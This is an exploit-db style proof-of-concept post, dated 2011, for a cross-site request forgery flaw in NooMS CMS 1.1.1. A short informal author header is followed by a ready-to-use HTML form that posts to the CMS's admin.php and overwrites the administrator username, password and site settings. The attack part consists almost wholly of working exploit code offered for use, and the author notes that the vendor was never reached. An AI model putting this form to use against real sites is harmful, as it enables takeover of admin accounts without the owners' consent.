40 lines
No EOL
1.4 KiB
Text
40 lines
No EOL
1.4 KiB
Text
# NooMS CMS version 1.1.1 CSRF
|
|
# Bug Found: April 9th 2011
|
|
# Found by: loneferret (as far as I know anyway)
|
|
# Software Download Link:
|
|
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
|
|
# Nods to exploit-db Team
|
|
|
|
|
|
# Well, I didn't have much to do this morning so figured I'd try to see how
|
|
# fast it would take
|
|
# me to find one of these. It's nothing to write home about. I mean...come
|
|
# on! Who would use
|
|
# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be
|
|
# surprised if
|
|
# there are other things to be found.
|
|
# But I need to get some chores done before the wife starts.
|
|
|
|
#
|
|
# Enjoy,
|
|
# loneferret
|
|
#
|
|
# p.s:
|
|
# I wanted to contact the creator, but he's page (using NooMS) is
|
|
# blank... nothing there so.. sorry.
|
|
|
|
---HTML STARTS HERE---
|
|
|
|
<form action='http://[host]/admin.php' method='post'>
|
|
<input type=hidden name='op' value='pref'>
|
|
<input type=hidden name='action' value='edit'>
|
|
|
|
Admin Username: <input type=text size=20 name='admin_user' value=''><br>
|
|
Admin Password: <input type=text size=20 name='admin_pwd' value=''><br>
|
|
Site Name: <input type=text size=40 name='site_name' value=''><br>
|
|
Site URL: <input type=text size=40 name='site_url' value=''><br>
|
|
Number of results per page: <input type=text size=10 name='search_numr' value=''><br>
|
|
Lang: <input type=text size=10 name='lang' value='en'><br>
|
|
Theme: <input type=text name=template value='default'>
|
|
<input type=submit value='change'>
|
|
</form> |